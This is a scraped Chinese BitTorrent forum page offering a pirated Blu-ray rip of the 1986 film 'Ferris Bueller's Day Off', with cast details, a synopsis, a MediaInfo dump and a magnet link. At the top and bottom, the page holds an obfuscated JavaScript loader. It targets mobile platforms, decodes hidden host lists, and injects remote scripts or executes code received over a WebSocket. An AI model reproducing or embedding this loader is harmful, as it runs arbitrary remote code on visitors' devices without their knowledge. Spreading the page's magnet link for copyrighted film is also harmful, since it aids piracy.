春天不是读书天[中文字幕].Ferris.Buellers.Day.Off.1986.1080p.BluRay.x265.10bit.DTS 7.49GB

版主小s 18天前 94

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 春天不是读书天 / 跷课天才(台) / 咪走堂(港) / 鬼头天兵

◎片 名 Ferris Bueller's Day Off

◎年 代 1986

◎产 地 美国

◎类 别 喜剧

◎语 言 英语

◎上映日期 1986-06-11(美国)

◎IMDb链接 https://www.imdb.com/title/tt0091042/

◎豆瓣评分 8.0/10 (27854人评价)

◎豆瓣链接 https://movie.douban.com/subject/1295437/

◎片 长 103 分钟

◎导 演 约翰·休斯 John Hughes (id:1004657)

◎编 剧 约翰·休斯 John Hughes (id:1004657)

◎演 员 马修·布罗德里克 Matthew Broderick (id:1000045)

阿兰·卢克 Alan Ruck (id:1010547)

米娅·萨拉 Mia Sara (id:1017954)

杰弗瑞·琼斯 Jeffrey Jones (id:1027832)

詹妮弗·格雷 Jennifer Grey (id:1000026)

辛迪·皮克特 Cindy Pickett (id:1000348)

莱曼·沃德 Lyman Ward (id:1164625)

查理·辛 Charlie Sheen (id:1049490)

本·斯坦 Ben Stein (id:1150280)

弗吉尼亚·卡珀斯 Virginia Capers (id:1071435)

斯科特·科菲 Scott Coffey (id:1045106)

约翰·休斯 John Hughes (id:1004657)

克里斯蒂·斯旺森 Kristy Swanson (id:1036391)

理查德·埃德森 Richard Edson (id:1343880)

Debra Montague Debra Montague (id:1360482)

珍妮特·希尔森 Janet Hirshenson (id:1286699)

约翰·W·科索 John W. Corso (id:1281310)

玛丽莲·万斯 Marilyn Vance (id:1276618)

迈克尔·杰曼 Michael Germain (id:1284741)

斯蒂芬·林 Stephen Lim (id:1290058)

◎标 签 青春 / 美国 / 喜剧 / 校园 / 成长 / 1986 / 剧情 / 电影

◎简 介

芝加哥又迎来了晴朗的一天,逃学高手菲利斯(马修?布罗德里克 Matthew Broderick 饰)自然不会在这天选择枯燥的测验,他伪装病重骗过父母,令同校的姐姐珍妮徒劳嫉妒。菲利斯找来好友凯伦(阿兰?卢克 Alan Ruck 饰),两人联手骗过训导主任罗宁,驾驶凯伦父亲珍藏的法拉利将菲利斯女友思朗接出学校兜风,菲利斯娴熟的电话骗术在凯伦和思朗的配合下将众人戏弄的团团乱转,学生们反而受他的影响颇深,在校内发起给菲利斯谎称的手术捐款。罗宁不堪忍受菲利斯一次次得欺骗,“微服私访”去校外希望能将菲利斯捉个正形,而在城中四处游荡的菲利斯三人则展开了一场隐藏自己身份的冒险……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 193748420544969447605031333778323234492 (0x91C296A6A8F170912D4AF67680215EBC)

  4. Complete name : [email protected]BQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.49 GiB

  8. Duration : 1 h 43 min

  9. Overall bit rate : 10.4 Mb/s

  10. Encoded date : UTC 2021-11-12 09:20:14

  11. Writing application : mkvmerge v53.0.0 ('Fool's Gold') 64-bit

  12. Writing library : libebml v1.4.1 + libmatroska v1.6.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 43 min

  20. Bit rate : 8 759 kb/s

  21. Width : 1 920 pixels

  22. Height : 816 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.233

  30. Stream size : 6.30 GiB (84%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=19.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Language : English

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 43 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 510 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.09 GiB (15%)

  51. Language : English

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. ID in the original source medium : 4613 (0x1205)

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 42 min

  62. Bit rate : 79.4 kb/s

  63. Count of elements : 3383

  64. Stream size : 58.3 MiB (1%)

  65. Language : Chinese

  66. Default : Yes

  67. Forced : No

  68. Original source medium : Blu-ray


  69. Text #2

  70. ID : 4

  71. ID in the original source medium : 4614 (0x1206)

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 1 h 42 min

  77. Bit rate : 79.9 kb/s

  78. Count of elements : 3383

  79. Stream size : 58.6 MiB (1%)

  80. Language : Chinese

  81. Default : No

  82. Forced : No

  83. Original source medium : Blu-ray


  84. Text #3

  85. ID : 5

  86. ID in the original source medium : 4615 (0x1207)

  87. Format : PGS

  88. Muxing mode : zlib

  89. Codec ID : S_HDMV/PGS

  90. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  91. Duration : 1 h 42 min

  92. Bit rate : 50.7 kb/s

  93. Count of elements : 3383

  94. Stream size : 37.2 MiB (0%)

  95. Language : Chinese

  96. Default : No

  97. Forced : No

  98. Original source medium : Blu-ray


  99. Text #4

  100. ID : 6

  101. ID in the original source medium : 4616 (0x1208)

  102. Format : PGS

  103. Muxing mode : zlib

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 1 h 42 min

  107. Bit rate : 51.1 kb/s

  108. Count of elements : 3383

  109. Stream size : 37.5 MiB (0%)

  110. Language : Chinese

  111. Default : No

  112. Forced : No

  113. Original source medium : Blu-ray


  114. Text #5

  115. ID : 7

  116. ID in the original source medium : 4608 (0x1200)

  117. Format : PGS

  118. Muxing mode : zlib

  119. Codec ID : S_HDMV/PGS

  120. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  121. Duration : 1 h 42 min

  122. Bit rate : 34.8 kb/s

  123. Count of elements : 2410

  124. Stream size : 25.5 MiB (0%)

  125. Language : English

  126. Default : No

  127. Forced : No

  128. Original source medium : Blu-ray


  129. Menu

  130. 00:00:00.000 : en:第 01 章

  131. 00:08:15.328 : en:第 02 章

  132. 00:17:42.770 : en:第 03 章

  133. 00:25:54.928 : en:第 04 章

  134. 00:31:29.846 : en:第 05 章

  135. 00:40:29.218 : en:第 06 章

  136. 00:47:33.976 : en:第 07 章

  137. 00:50:55.677 : en:第 08 章

  138. 00:58:01.728 : en:第 09 章

  139. 01:05:37.391 : en:第 10 章

  140. 01:11:20.025 : en:第 11 章

  141. 01:19:45.113 : en:第 12 章

  142. 01:29:25.443 : en:第 13 章

  143. 01:36:28.199 : en:第 14 章




复制代码


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:20A9788D9425FA5B5F2B042240EDB4E17FDB2E27

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};